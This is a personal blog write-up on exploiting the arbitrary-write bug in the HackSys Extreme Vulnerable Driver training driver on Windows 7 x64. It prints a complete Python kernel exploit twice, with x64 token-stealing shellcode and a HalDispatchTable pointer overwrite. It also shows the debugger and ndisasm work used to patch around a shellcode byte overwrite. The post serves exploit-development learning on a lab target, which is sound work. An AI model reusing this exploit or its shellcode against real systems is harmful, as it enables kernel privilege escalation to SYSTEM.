HEVD Exploits – Windows 7 x86-64 Arbitrary Write

18 minute read

Introduction

Continuing on with the Windows exploit journey, it’s time to start exploiting kernel-mode drivers and learning about writing exploits for ring 0. As I did with my OSCE prep, I’m mainly blogging my progress as a way for me to reinforce concepts and keep meticulous notes I can reference later on. I can’t tell you how many times I’ve used my own blog as a reference for something I learned 3 months ago and had totally forgotten.

This series will be me attempting to run through every exploit on the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. I can’t even begin to explain how amazing a training tool like this is for those of us just starting out. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

I used the following blogs as references:

Huge thanks to the blog authors, no way I could’ve finished these first two exploits without your help/wisdom.

Goal

For this post, I mostly relied on the GradiusX code mentioned above. They’re doing a different technique in their code (hopefully we’ll try it at some point) but the way they deal with the SystemModuleInformation struct in Python was very crucial to how I ended up doing it in this post. As you may remember from the x86 version of this post, the goal of this post was to create a much more organized exploit code that utilized classes instead of treating the aforementioned struct as a long string. We were succesful in that. The only thing that really bugged me about this exploit was there was behavior where during my exploit, the first two bytes of my shellcode buffer would be overwritten. Besides the BSODs, this was frustrating mostly because I never really root caused the issue. The issue may in fact lie in the way I decided to allocate my userland string buffers in Python, but time will tell. Ultimately, I was able to overcome the overwrites and develop a reliable exploit.

This exploit code will be very similar to the last post, so please read that one if you haven’t. There’s honestly not much difference. We’ll only be talking about the differences and the shellcode overwrite issue and how I solved it.

You should be very familiar with our exploit approach from the previous post before continuing!!

Exploit Code Considerations for x64

In this section, I’ll be detailing aspects of the exploit code that differ from its x86 counterpart.

As you may recall from the first post, we need to get the kernel image name and base address so that we can use the address to calculate the location of the HalDispatchTable because we need to overwrite a function pointer there. A lot of this code will look the same, here is the entire function:

def base():
    
    print("[*] Calling NtQuerySystemInformation w/SystemModuleInformation")
    sys_info = create_string_buffer(0)
    sys_info_len = c_ulong(0)

    ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    sys_info = create_string_buffer(sys_info_len.value)

    result = ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    if result == 0x0:
        print("[*] Success, allocated {}-byte result buffer".format(str(len(sys_info))))

    else:
        print("[!] NtQuerySystemInformation failed with NTSTATUS: {}".format(hex(result)))

    class SYSTEM_MODULE_INFORMATION(Structure):
        _fields_ = [("Reserved", c_void_p * 2),
                    ("ImageBase", c_void_p),
                    ("ImageSize", c_long),
                    ("Flags", c_ulong),
                    ("LoadOrderIndex", c_ushort),
                    ("InitOrderIndex", c_ushort),
                    ("LoadCount", c_ushort),
                    ("ModuleNameOffset", c_ushort),
                    ("ImageName", c_char * 256)]

    # thanks GradiusX
    handle_num = c_ulong(0)
    handle_num_str = create_string_buffer(sys_info.raw[:8])
    memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

    print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))
    
    sys_info = create_string_buffer(sys_info.raw[8:])

    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        if "ntoskrnl" or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)

The primary difference here is going to be establishing a class for the SYSTEM_MODULE_INFORMATION structure. Its very similar to GradiusX’s class in their exploit script; however, I changed the name of the last member so that it was more congruent with the FuzzySec’s Powershell script. For more information about this struct, please see the documenation I referenced throughout this bug class exploitation process.

Let me break this down piece by piece. We declare a class that matches exactly with the aforementioned documentation that I referenced. We then create a handle_num variable of type c_ulong() which will be 8 bytes on x64 Windows. We create a string buffer and fill it with the first 8 bytes of our returned sys_info struct. We then move this buffer to the address of our handle_num variable which allows us to get the value in decimal of the number of SystemModuleInformation objects we returned with our NtQuerySystemInformation API call. You can see this here:

handle_num = c_ulong(0)
handle_num_str = create_string_buffer(sys_info.raw[:8])
memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))

We then shorten the returned sys_info string by cutting off the first 8 bytes we just used and then interating through the string casting each 296 byte chunk as an instance of our class. You can see that we declare a counter variable which will increment each iteration by the size of our class (296 bytes). The loop does the following:

  • While we haven’t iterated through all of our returned modules (by getting the number of returned modules with handle_num.value),
  • create a temporary SYSTEM_MODULE_INFORMATION instance called tmp,
  • create a string buffer in a 0 to 296 byte chunk that contains one complete returned struct,
  • move that string buffer into our temporary tmp struct. You can see all of this happening here:
    counter = 0
      for x in range(handle_num.value):
          tmp = SYSTEM_MODULE_INFORMATION()
          tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
          memmove(addressof(tmp), tmp_si, sizeof(tmp))
          if "ntoskrnl" or "ntkrnl" in tmp.ImageName:
              img_name = tmp.ImageName.split("\\")[-1]
              print("[*] Kernel Type: {}".format(img_name))
              kernel_base = hex(tmp.ImageBase)[:-1]
              print("[*] Kernel Base: {}".format(kernel_base))
              return img_name, kernel_base
          counter += sizeof(tmp)
    

We then check the ImageName member of the struct, and if it’s a match for the kernel images we want to keep track of, we progress. We grab the name and the base address and return them. Function over, we just massively improved our code from the x86 version.

I’m not going to paste the entire function this time; however, in the next function we need to call both LoadLibraryA and GetProcAddress so that we can ultimately calculate the location of our target HDT function pointer. In order for those APIs to behave properly, we have to use the restype utility in ctypes for us to change the return type of a function. We do so accordingly to work with our 64-bit OS:

kernel32.LoadLibraryA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64

Everything else works pretty much the same, except our target_hal variable on this one will be the HalDispatchTable+0x8 since we’re dealing with 8-byte pointers now (previously, it was HalDispatchTable+0x4). You would think now, all we do is just paste in the Token Stealing shellcode for x64 we already used in the stack overflow post and be on our merry way; however, that was not the case. As of right now, after inserting our shellcode from the last x64 exploit we performed, our code looks like this in all:

import ctypes, sys, struct
from ctypes import *
from ctypes.wintypes import *
from subprocess import *

kernel32 = windll.kernel32
ntdll = windll.ntdll

# HEVD!TriggerArbitraryOverwrite instructions: 
# mov     r11,qword ptr [rbx]
# mov     qword ptr [rdi],r11

def base():
    
    print("[*] Calling NtQuerySystemInformation w/SystemModuleInformation")
    sys_info = create_string_buffer(0)
    sys_info_len = c_ulong(0)

    ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    sys_info = create_string_buffer(sys_info_len.value)

    result = ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    if result == 0x0:
        print("[*] Success, allocated {}-byte result buffer".format(str(len(sys_info))))

    else:
        print("[!] NtQuerySystemInformation failed with NTSTATUS: {}".format(hex(result)))

    class SYSTEM_MODULE_INFORMATION(Structure):
        _fields_ = [("Reserved", c_void_p * 2),
                    ("ImageBase", c_void_p),
                    ("ImageSize", c_long),
                    ("Flags", c_ulong),
                    ("LoadOrderIndex", c_ushort),
                    ("InitOrderIndex", c_ushort),
                    ("LoadCount", c_ushort),
                    ("ModuleNameOffset", c_ushort),
                    ("ImageName", c_char * 256)]

    # thanks GradiusX
    handle_num = c_ulong(0)
    handle_num_str = create_string_buffer(sys_info.raw[:8])
    memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

    print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))

    sys_info = create_string_buffer(sys_info.raw[8:])

    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        if "ntoskrnl" or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)

def hal_calc(img_name, kernel_base):

    
    kernel32.LoadLibraryA.restype = c_uint64
    kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
    kernel32.GetProcAddress.restype = c_uint64
    
    kern_handle = kernel32.LoadLibraryA(img_name)
    if not kern_handle:
        print("[!] LoadLibrary failed to retrieve handle to kernel with error: {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Kernel Handle: {}".format(hex(kern_handle))[:-1])

    userland_hal = kernel32.GetProcAddress(kern_handle,"HalDispatchTable")
    if not userland_hal:
        print("[!] GetProcAddress failed with error {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Userland HalDispatchTable Address: {}".format(hex(userland_hal))[:-1])

    kernel_hal = userland_hal - kern_handle + int(kernel_base,16)
    printable_hal = hex(kernel_hal)
    if printable_hal[-1] == "L":
        printable_hal = printable_hal[:-1]
    print("[*] Kernel HalDispatchTable Address: {}".format(printable_hal))

    target_hal = kernel_hal + 0x8    
    print("[*] Target HalDispatchTable Function Pointer at: {}".format(hex(target_hal)[:-1]))

    return target_hal    

def send_buf(target_hal):

    hevd = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 
        0xC0000000, 
        0, 
        None, 
        0x3, 
        0, 
        None)
    
    if (not hevd) or (hevd == -1):
        print("[!] Failed to retrieve handle to device-driver with error-code: " + str(GetLastError()))
        sys.exit(1)
    else:
        print("[*] Successfully retrieved handle to device-driver: " + str(hevd))

    
    shellcode = bytearray(
        "\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
        "\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
        "\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
        "\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
        "\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
        "\x5B\x59\x58\xc3")

    print("[*] Allocating shellcode character array...")
    try:
        usermode_addr = (c_char * len(shellcode)).from_buffer(shellcode)
        ptr = addressof(usermode_addr)
    except Exception as e:
        print("[!] Failed to allocate shellcode char array with error: " + str(e))
    print("[*] Allocated shellcode character array at: {}".format(hex(ptr)[:-1]))

    print("[*] Marking shellcode RWX...")
    result = kernel32.VirtualProtect(
        usermode_addr,
        c_int(len(shellcode)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code: {}".format(str(GetLastError())))

    print("[*] Allocating our What buffer...")
    try:
        new_buf_contents = bytearray(struct.pack("<Q", ptr))
        new_buf = (c_char * len(new_buf_contents)).from_buffer(new_buf_contents)
        new_buf_ptr = addressof(new_buf)
    except Exception as e:
        print("[!] Failed to allocate What buffer with error: " + str(e))
    print("[*] Allocated What buffer at: {}".format(hex(new_buf_ptr)[:-1]))

    print("[*] Marking What buffer RWX...")
    result = kernel32.VirtualProtect(
        new_buf,
        c_int(len(new_buf_contents)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code {}".format(str(GetLastError())))

    buf = struct.pack("<Q", new_buf_ptr)
    buf += struct.pack("<Q", target_hal)
    buf_length = len(buf)
    
    result = kernel32.DeviceIoControl(
        hevd,
        0x22200b,
        buf,
        buf_length,
        None,
        0,
        byref(c_ulong()),
        None
    )

    if result != 0:
        print("[*] Buffer sent to driver successfully.")
    else:
        print("[!] Payload failed. Last error: " + str(GetLastError()))

def exploit():
    
    print("[*] Triggering with NtQueryIntervalProfile...")
    ntdll.NtQueryIntervalProfile(0x2408, byref(c_ulong()))

    print("[*] Opening system shell...")
    Popen("start cmd", shell=True)


        
img_name, kernel_base = base()
target_hal = hal_calc(img_name, kernel_base)
send_buf(target_hal)
exploit()

Roadblock

Possibly related to how I’m allocating buffers for my shellcode in Python, I ran into an issue where everything worked perfectly but somewhere between me allocating my shellcode buffer and then arriving at our NtQueryIntervalProfile API call (which triggers a call for the function pointer at HalDispatchTable+0x8), the first two bytes of my shellcode buffer are overwritten with \x26\x00. Let’s take a look in WinDBG and see what we can see.

Let’s set a breakpoint on HEVD!TriggerArbitraryOverwrite to get the party started and then run our exploit.

We hit our breakpoint as planned, let’s look at our debug messages in the console to get some more info.

We can see that our shellcode array is located at 0x1df64a0. Let’s check out our memory view of that location in memory.

Awesome, our shellcode looks exactly how we sent it. Let’s now set a breakpoint on NtQueryIntervalProfile since that is our trigger and we’ll know if everything is going to plan. (bp !NtQueryIntervalProfile)

Great, hit our breakpoint. Now let’s check out our shellcode buffer so you can see the problem! Let’s look at the exact same memory view again.

Houston, we have a problem. Look at the first two bytes there, \x26\x00 have overwritten the first two bytes of our shellcode buffer. If we disassemble this, we can see how this is now being interpreted.

Looking at the disassembly now, we see that the first 4 bytes of our overwritten shellcode, 26004153, are being interpreted as add byte ptr es:[rcx+53h],al.

Let’s grab some register values and see if we can figure out what this would do.

rax 0
rcx 2408

So if we add 0 to a byte pointer at 0x2408, we’re probably looking at an access violation as that is probably not mapped memory. I’m going to manually change \x26 to \xc3 (the opcode for RET) so we can exit out of this shellcode safely and keep working with this session. To manually change the memory, in the Memory view, simply put your cursor infront of the 26 and type one letter/number at a time, be patient as this can take some time for WinDBG to register the change. One done, I’m going to go ahead and hit g in the console and let our script finish.

Finding the Culprit

Let’s do all of this again, except this time, we’ll put an “access” breakpoint on the memory address of our shellcode buffer and we’ll catch whoever the hell is writing to it! Let’s first run the script again with our HEVD!TriggerArbitraryOverwrite breakpoint so we can get the console output, find our shellcode buffer pointer, and then set a breakpoint on it.

Perfect, now we set an access breakpoint on our shellcode buffer pointer with the following: ba w1 0x1e864a0.

ba == access breakpoint

w == watch for write operations

1 == on the first byte there

0x1e864a0 == address to monitor

Hit g and we’ll eventually hit our breakpoint.

We paused on mov rax,r8 however; the real culprit proceeds this instruction: mov word ptr [r8+10h],ax.

If we look at some register values:

rax a0026
r8 1e86290

We can see how this would overwrite our first two bytes of our shellcode. r8 + 0x10 is going to be 0x1e864a0 (psst, that’s where our shellcode is) and we’re writing a 2 byte value there (word) which is the lower two bytes of rax (0026). So now we see how our shellcode was overwritten. How can we alter our shellcode so that we can take this overwrite and still progress?

Moving on Despite the Haters

I’m honestly not sure why this is happening to us. I can’t really determine what instructions are leading to these conditions. The call stack is empty and devoid of named functions so that’s no help; futhermore, the address scheme is all userspace. It would be strange if it was my Python code causing the problems since this is happening temporally between the time my buffers are allocated and when NtQueryIntervalProfile is called. If you’re an exploit god, please reach out and let me know why I suck so bad.

We can leverage the ndisasm utility on Linux to test out some alternative scenarios dealing with our overwrite. Our model shellcode is this:

 "\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
 "\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
 "\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
 "\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
 "\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
 "\x5B\x59\x58\xc3"

Ok, so what happens when we take that first line, overwrite the first two bytes with \x26\x00 ?

 root@kali:~# echo -ne '\x26\x00\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  26004153          add [es:rcx+0x53],al
00000004  52                push rdx
00000005  4831C0            xor rax,rax
00000008  65488B8088010000  mov rax,[gs:rax+0x188]

This is precisely what we saw in the WinDBG disassembler! Perfect. Let’s experiment. My first thought: We are overwriting two bytes, let’s put two NOPs as padding! We would then end up with something like this:

root@kali:~# echo -ne '\x26\x00\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  26005051          add [es:rax+0x51],dl
00000004  4153              push r11
00000006  52                push rdx
00000007  4831C0            xor rax,rax
0000000A  65488B8088010000  mov rax,[gs:rax+0x188]

Oof, that’s still not good. This would also definitely be an access violation as you’ll remember rax was a small value when we run our exploit at this stage. This memory wouldn’t be mapped appropriately. We need a way to alter how the subsequent commands after \x26\x00 are being interpreted. What if we add a third padding byte that’s purpose is to separate the \x26\x00 opcodes as non-harmfully as possible from the rest of our shellcode? I started experimenting. Let’s just try adding a \x00 byte and see what happens!

root@kali:~# echo -ne '\x26\x00\x00\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  260000            add [es:rax],al
00000003  50                push rax
00000004  51                push rcx
00000005  4153              push r11
00000007  52                push rdx
00000008  4831C0            xor rax,rax
0000000B  65488B8088010000  mov rax,[gs:rax+0x188]

This is still not optimal, as you can see, we’re still directly writing to memory that is at a very low address space and will cause us problems most likely. However, we did successfully truncate this series of operations to only 3 bytes! I started spamming potential 3rd byte padding candidates with a script and eventually landed on candidate \xff. Let’s test this out and see if this works for our purposes:

root@kali:~# echo -ne '\x26\x00\xff\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  2600FF            es add bh,bh
00000003  50                push rax
00000004  51                push rcx
00000005  4153              push r11
00000007  52                push rdx
00000008  4831C0            xor rax,rax
0000000B  65488B8088010000  mov rax,[gs:rax+0x188]

Wow, now this is perfect. All we’re doing now is just adding a register to a register. There’s not really any way this can get us in trouble. And since our shellcode runs directly after this first operation, if we had to, we could change the register back to its original value with no problem!

This instruction es add bh,bh doesn’t really cause problems either. You can read here about how data segment registers work on 64 bit operating systems.

So this is perfect. We can update our shellcode now to be the following:

"\x90\x90\xff\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
"\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
"\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
"\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
"\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
"\x5B\x59\x58\xc3"

If we update our script with that shellcode, our final exploit code becomes:

import ctypes, sys, struct
from ctypes import *
from ctypes.wintypes import *
from subprocess import *

kernel32 = windll.kernel32
ntdll = windll.ntdll

# HEVD!TriggerArbitraryOverwrite instructions: 
# mov     r11,qword ptr [rbx]
# mov     qword ptr [rdi],r11

def base():
    
    print("[*] Calling NtQuerySystemInformation w/SystemModuleInformation")
    sys_info = create_string_buffer(0)
    sys_info_len = c_ulong(0)

    ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    sys_info = create_string_buffer(sys_info_len.value)

    result = ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    if result == 0x0:
        print("[*] Success, allocated {}-byte result buffer".format(str(len(sys_info))))

    else:
        print("[!] NtQuerySystemInformation failed with NTSTATUS: {}".format(hex(result)))

    class SYSTEM_MODULE_INFORMATION(Structure):
        _fields_ = [("Reserved", c_void_p * 2),
                    ("ImageBase", c_void_p),
                    ("ImageSize", c_long),
                    ("Flags", c_ulong),
                    ("LoadOrderIndex", c_ushort),
                    ("InitOrderIndex", c_ushort),
                    ("LoadCount", c_ushort),
                    ("ModuleNameOffset", c_ushort),
                    ("ImageName", c_char * 256)]

    # thanks GradiusX
    handle_num = c_ulong(0)
    handle_num_str = create_string_buffer(sys_info.raw[:8])
    memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

    print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))

    sys_info = create_string_buffer(sys_info.raw[8:])

    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        if "ntoskrnl" or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)

def hal_calc(img_name, kernel_base):

    
    kernel32.LoadLibraryA.restype = c_uint64
    kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
    kernel32.GetProcAddress.restype = c_uint64
    
    kern_handle = kernel32.LoadLibraryA(img_name)
    if not kern_handle:
        print("[!] LoadLibrary failed to retrieve handle to kernel with error: {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Kernel Handle: {}".format(hex(kern_handle))[:-1])

    userland_hal = kernel32.GetProcAddress(kern_handle,"HalDispatchTable")
    if not userland_hal:
        print("[!] GetProcAddress failed with error {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Userland HalDispatchTable Address: {}".format(hex(userland_hal))[:-1])

    kernel_hal = userland_hal - kern_handle + int(kernel_base,16)
    printable_hal = hex(kernel_hal)
    if printable_hal[-1] == "L":
        printable_hal = printable_hal[:-1]
    print("[*] Kernel HalDispatchTable Address: {}".format(printable_hal))

    target_hal = kernel_hal + 0x8    
    print("[*] Target HalDispatchTable Function Pointer at: {}".format(hex(target_hal)[:-1]))

    return target_hal    

def send_buf(target_hal):

    hevd = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 
        0xC0000000, 
        0, 
        None, 
        0x3, 
        0, 
        None)
    
    if (not hevd) or (hevd == -1):
        print("[!] Failed to retrieve handle to device-driver with error-code: " + str(GetLastError()))
        sys.exit(1)
    else:
        print("[*] Successfully retrieved handle to device-driver: " + str(hevd))

    
    shellcode = bytearray(
        "\x90\x90\xff\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
        "\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
        "\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
        "\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
        "\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
        "\x5B\x59\x58\xc3")

    print("[*] Allocating shellcode character array...")
    try:
        usermode_addr = (c_char * len(shellcode)).from_buffer(shellcode)
        ptr = addressof(usermode_addr)
    except Exception as e:
        print("[!] Failed to allocate shellcode char array with error: " + str(e))
    print("[*] Allocated shellcode character array at: {}".format(hex(ptr)[:-1]))

    print("[*] Marking shellcode RWX...")
    result = kernel32.VirtualProtect(
        usermode_addr,
        c_int(len(shellcode)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code: {}".format(str(GetLastError())))

    print("[*] Allocating our What buffer...")
    try:
        new_buf_contents = bytearray(struct.pack("<Q", ptr))
        new_buf = (c_char * len(new_buf_contents)).from_buffer(new_buf_contents)
        new_buf_ptr = addressof(new_buf)
    except Exception as e:
        print("[!] Failed to allocate What buffer with error: " + str(e))
    print("[*] Allocated What buffer at: {}".format(hex(new_buf_ptr)[:-1]))

    print("[*] Marking What buffer RWX...")
    result = kernel32.VirtualProtect(
        new_buf,
        c_int(len(new_buf_contents)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code {}".format(str(GetLastError())))

    buf = struct.pack("<Q", new_buf_ptr)
    buf += struct.pack("<Q", target_hal)
    buf_length = len(buf)
    
    result = kernel32.DeviceIoControl(
        hevd,
        0x22200b,
        buf,
        buf_length,
        None,
        0,
        byref(c_ulong()),
        None
    )

    if result != 0:
        print("[*] Buffer sent to driver successfully.")
    else:
        print("[!] Payload failed. Last error: " + str(GetLastError()))

def exploit():
    
    print("[*] Triggering with NtQueryIntervalProfile...")
    ntdll.NtQueryIntervalProfile(0x2408, byref(c_ulong()))

    print("[*] Opening system shell...")
    Popen("start cmd", shell=True)


        
img_name, kernel_base = base()
target_hal = hal_calc(img_name, kernel_base)
send_buf(target_hal)
exploit()

If we run our updated shellcode exploit script, we get our coveted nt authority/system shell!

Conclusion

We learned a really useful WinDBG feature on this one, the access breakpoint. I feel like this is going to come in really handy going forward. It was fun troubleshooting this issue, discovering that with my script there was an unavoidable overwrite, and then taking the overwite and progressing anyways. This is the type of thing that really builds skills in my opinion. We were forced to go off-plan and improvise and get into the debugger to figure out what’s going on. Onto the next exploit! Thanks again to everyone that’s published blogs on Windows exploit development, truly it’s been so appreciated.